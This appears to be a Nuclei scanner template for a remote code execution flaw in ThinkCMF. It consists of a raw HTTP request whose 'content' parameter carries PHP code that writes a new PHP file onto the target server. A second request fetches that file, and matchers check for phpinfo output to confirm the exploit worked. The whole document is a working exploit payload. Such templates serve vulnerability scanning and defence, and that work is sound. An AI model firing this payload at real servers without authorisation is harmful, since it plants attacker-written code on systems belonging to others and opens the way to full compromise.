id: thinkcmf-rce

info:
  name: ThinkCMF RCE
  author: pikpikcu
  severity: critical
  reference: https://www.freebuf.com/vuls/217586.html
  tags: thinkcmf,rce

requests:
  - raw:
      - |
        GET /index.php?a=fetch&content={{url_encode('<?php file_put_contents(\"{{randstr}}.php\",\"<?php echo phpinfo();\");')}} HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /{{randstr}}.php HTTP/1.1
        Host: {{Hostname}}

    req-condition: true
    matchers:
      - type: dsl
        dsl:
          - 'contains(body_2, "PHP Extension")'
          - 'contains(body_2, "PHP Version")'
          - 'status_code_2 == 200'
        condition: and